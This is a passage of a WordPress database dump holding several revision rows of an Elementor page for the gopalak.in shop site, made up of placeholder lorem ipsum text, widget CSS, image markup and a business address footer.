<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 14:51:03','2022-09-21 09:21:03','',1373,'https://gopalak.in/?p=1412',0,'revision','',0),(1414,1,'2022-09-21 15:05:54','2022-09-21 09:35:54','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 15:05:54','2022-09-21 09:35:54','',1373,'https://gopalak.in/?p=1414',0,'revision','',0),(1415,1,'2022-09-21 15:05:54','2022-09-21 09:35:54','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 15:05:54','2022-09-21 09:35:54','',1373,'https://gopalak.in/?p=1415',0,'revision','',0),(1416,1,'2022-09-21 15:05:54','2022-09-21 09:35:54','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 15:05:54','2022-09-21 09:35:54','',1373,'https://gopalak.in/?p=1416',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1417,1,'2022-09-21 15:07:58','2022-09-21 09:37:58','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box 